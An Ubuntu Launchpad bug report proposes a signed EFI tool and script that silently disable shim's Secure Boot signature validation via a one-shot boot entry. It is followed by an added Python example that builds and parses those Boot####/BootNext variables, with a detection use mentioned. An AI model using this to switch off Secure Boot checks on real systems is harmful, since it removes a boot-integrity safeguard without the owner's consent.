Public bug reported:

On some secureboot enabled machines, after updating to kernel 3.19 without disabling secureboot, some DKMS modules (for example, kernel wireless and audio) won't work, because it forces the kernel and modules to be signed.
Considering that end users don't have enough knowledge to use "mokutil" to disable the shim signature validation, provide a way to disable signature validation on shim without user interaction.

MokSBStateSet.efi - UEFI shell application to set two variables (MokSBState and MokSBStateRT) which disable signature validation on shim. It should be signed with the Ubuntu key.

shim_dis_validation.sh - creates a boot entry and sets BootNext to it. This boot entry will boot to shim and then, based on the load option (second stage boot on shim), execute MokSBStateSet.efi. That's why MokSBStateSet.efi needs to be signed and the key must be in the MOK database under secureboot enabled. The MOK database already has the Canonical key, so MokSBStateSet.efi should be signed with the Ubuntu key, so that users don't need to do anything to import a key into the MOK database.

[Execute]
Put MokSBStateSet-signed.efi and shim_dis_validation.sh in the same folder
# sudo sh shim_dis_validation.sh

[Test case]
1. Get the signed MokSBStateSet.efi, MokSBStateSet-signed.efi
2. Import the key into the MOK database; this is not necessary if MokSBStateSet.efi is signed with the Canonical key
   # mokutil --import MOK.cer
3. sudo sh shim_dis_validation.sh
4. Check the DKMS functions

[Potential issue]
Shim has a bug that causes the shim second stage to fail, and a fix for it: https://bugs.launchpad.net/ubuntu/+source/shim/+bug/1581299
The load option data in shim_dis_validation.sh will need to be changed according to the shim version in future releases.

[Todo]
MokSBStateSet.efi needs to be signed with the Canonical key.

** Affects: shim-signed (Ubuntu)
     Importance: Undecided
     Assignee: Ivan Hu (ivan.hu)
         Status: Confirmed

** Attachment added: "shim_dis_valid.tar.gz"
   https://bugs.launchpad.net/bugs/1609209/+attachment/4712747/+files/shim_dis_valid.tar.gz

** Changed in: shim-signed (Ubuntu)
     Assignee: (unassigned) => Ivan Hu (ivan.hu)

-- 
You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1609209

Title:
  Disable signature validation on shim without user interactions under secureboot enabled

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shim-signed/+bug/1609209/+subscriptions

-- 
ubuntu-bugs mailing list
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
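The boot entry that shim_dis_validation.sh asks efibootmgr to create, shown as the raw UEFI variable contents it ends up as. This is an added example, not the report's script or anything from the attached tarball: it builds the EFI_LOAD_OPTION blob for a Boot#### variable whose device path points at shim on the ESP and whose optional data (the image's LoadOptions) is the UCS-2 name of the second-stage binary, plus the two-byte BootNext value, and it parses the blob back. The partition GUID, start LBA, size, partition number, the \EFI\ubuntu\shimx64.efi path and the entry label are all made up here; the report does not state them. The optional-data form follows the report's description of how shim picks its second stage, and, as the report itself warns, the exact form shim accepts has changed between shim versions, so check it against the shim you ship. The reason the variables are set by a signed pre-boot image rather than from Linux is that shim deliberately ignores a MokSBState that carries the runtime-access attribute, which is what a variable written from the OS gets; the flip side, worth saying plainly, is that with a Canonical-signed MokSBStateSet.efi on the ESP, anyone who can write Boot####/BootNext as root can switch off shim's signature checks without ever seeing the MokManager prompt.

```python
"""Build/parse the Boot#### and BootNext contents behind a "boot shim once
with a custom second stage" entry, i.e. what shim_dis_validation.sh asks
efibootmgr to create. Added example, not code from the report or its tarball.
Assumed (not from the report): ESP = GPT partition 1, made-up partition
GUID/start/size, shim at \\EFI\\ubuntu\\shimx64.efi, the entry label text.
"""
import struct
import uuid

LOAD_OPTION_ACTIVE = 0x00000001           # EFI_LOAD_OPTION.Attributes
EFI_VARIABLE_NON_VOLATILE = 0x1           # variable attributes for Boot####/BootNext
EFI_VARIABLE_BOOTSERVICE_ACCESS = 0x2
EFI_VARIABLE_RUNTIME_ACCESS = 0x4
BOOT_VAR_ATTRS = (EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS
                  | EFI_VARIABLE_RUNTIME_ACCESS)

# Device-path node types/subtypes (UEFI spec, media device paths)
MEDIA_DEVICE_PATH, MEDIA_HARDDRIVE_DP, MEDIA_FILEPATH_DP = 0x04, 0x01, 0x04
END_DEVICE_PATH_TYPE, END_ENTIRE_DEVICE_PATH_SUBTYPE = 0x7F, 0xFF
MBR_TYPE_GPT, SIGNATURE_TYPE_GUID = 0x02, 0x02


def ucs2(s):
    """NUL-terminated UCS-2LE, the CHAR16 string form UEFI uses."""
    return s.encode("utf-16-le") + b"\x00\x00"


def dp_node(ntype, subtype, payload):
    """One EFI_DEVICE_PATH_PROTOCOL node: Type, SubType, Length (incl. 4-byte header)."""
    return struct.pack("<BBH", ntype, subtype, 4 + len(payload)) + payload


def harddrive_node(part_num, part_start_lba, part_size_lba, part_guid):
    """HARDDRIVE_DEVICE_PATH for a GPT partition (42 bytes in total)."""
    payload = struct.pack("<IQQ", part_num, part_start_lba, part_size_lba)
    payload += part_guid.bytes_le                      # GUID as UEFI stores it
    payload += struct.pack("<BB", MBR_TYPE_GPT, SIGNATURE_TYPE_GUID)
    return dp_node(MEDIA_DEVICE_PATH, MEDIA_HARDDRIVE_DP, payload)


def filepath_node(path):
    return dp_node(MEDIA_DEVICE_PATH, MEDIA_FILEPATH_DP, ucs2(path))


END_NODE = dp_node(END_DEVICE_PATH_TYPE, END_ENTIRE_DEVICE_PATH_SUBTYPE, b"")


def build_load_option(description, device_path, optional_data, attrs=LOAD_OPTION_ACTIVE):
    """EFI_LOAD_OPTION = Attributes, FilePathListLength, Description (CHAR16),
    FilePathList, OptionalData. OptionalData becomes the loaded image's
    LoadOptions; shim reads its second-stage name from there."""
    return (struct.pack("<IH", attrs, len(device_path)) + ucs2(description)
            + device_path + optional_data)


def parse_load_option(blob):
    attrs, fpl_len = struct.unpack_from("<IH", blob, 0)
    off = 6
    while blob[off:off + 2] != b"\x00\x00":   # scan in 2-byte steps for the UCS-2 NUL
        off += 2
    description = blob[6:off].decode("utf-16-le")
    off += 2
    return {"attributes": attrs, "description": description,
            "device_path": blob[off:off + fpl_len],
            "optional_data": blob[off + fpl_len:]}


def device_path_files(device_path):
    """Walk the packed node list and return the file-path node strings."""
    files, off = [], 0
    while off + 4 <= len(device_path):
        ntype, subtype, ln = struct.unpack_from("<BBH", device_path, off)
        if ntype == END_DEVICE_PATH_TYPE:
            break
        if ntype == MEDIA_DEVICE_PATH and subtype == MEDIA_FILEPATH_DP:
            files.append(device_path[off + 4:off + ln].decode("utf-16-le").rstrip("\x00"))
        off += ln
    return files


def shim_second_stage_entry(part_guid, second_stage="MokSBStateSet-signed.efi"):
    """Boot#### contents: load shim from the ESP with the second-stage file name
    as load-option data (form per the report; it varies by shim version)."""
    part_guid = uuid.UUID(str(part_guid))
    dp = (harddrive_node(1, 2048, 1048576, part_guid)          # assumed ESP geometry
          + filepath_node("\\EFI\\ubuntu\\shimx64.efi") + END_NODE)
    return build_load_option("shim dis validation", dp, ucs2(second_stage))


def bootnext(entry_number):
    """BootNext is one UINT16: the Boot#### number to use on the next boot only."""
    return struct.pack("<H", entry_number)


def efivarfs_payload(data, attrs=BOOT_VAR_ATTRS):
    """Linux efivarfs files carry 4 bytes of variable attributes before the data."""
    return struct.pack("<I", attrs) + data


if __name__ == "__main__":
    guid = "e4a3e1a6-6a1f-4c2b-9d6c-0a0b0c0d0e0f"    # constructed partition GUID
    print("Boot0004 =", shim_second_stage_entry(guid).hex())
    print("BootNext =", bootnext(4).hex())
```

The efivarfs_payload() output is what would be written to /sys/firmware/efi/efivars/Boot0004-8be4df61-93ca-11d2-aa0d-00e098032b8c (and the BootNext-… file under the same GUID) if the variables were set by hand rather than through efibootmgr; the entry number 0004 is arbitrary. The reverse direction is the useful one for a detection or forensics check: reading Boot####/BootNext from efivarfs and running them through parse_load_option() shows whether a one-shot entry pointing shim at something other than grubx64.efi has been planted.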
